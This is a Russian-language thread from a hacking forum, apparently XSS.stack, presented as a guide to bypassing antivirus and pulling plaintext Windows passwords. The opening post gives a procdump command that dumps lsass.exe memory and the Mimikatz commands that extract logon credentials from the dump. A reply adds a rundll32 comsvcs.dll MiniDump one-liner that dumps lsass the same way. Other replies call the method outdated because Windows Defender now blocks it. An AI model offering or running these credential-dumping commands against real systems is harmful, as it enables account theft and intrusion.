• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Обход антивирусного ПО для получения паролей Windows в открытом виде с помощью procdump+Mimikatz

0x0021h

RAID-массив
Пользователь
Регистрация
14.11.2021
Сообщения
53
Решения
1
Реакции
78
procdump скачать на: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
Код:
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

1642413245625.png


Код:
sekurlsa::minidump lsass.dmp
 
sekurlsa::logonpasswords

1642413289713.png
 
судя по скрину 2017 год же)
Тоесть берем процдамп от 17го года и все ок. Сильное колдунство, впечатлен.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Тоесть берем процдамп от 17го года и все ок. Сильное колдунство, впечатлен.
Возвращаемся в 2017 со знаниями 2022)
 
Возвращаемся в 2017 со знаниями 2022)
Там на скрине довольно свежий логон тайм если что - 2020 8 21.
 
Там на скрине довольно свежий логон тайм если что - 2020 8 21.
тебе WinDef сейчас не даст это сделать.
так же как и это:
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <lsass PID> C:\temp\lsass.dmp full
 
тебе WinDef сейчас не даст это сделать.
так же как и это:
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <lsass PID> C:\temp\lsass.dmp full
Так и я о том же, что это какой то юмор, кто то даже лайкнул. Нынче лсассы добываются приватными инструментами.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх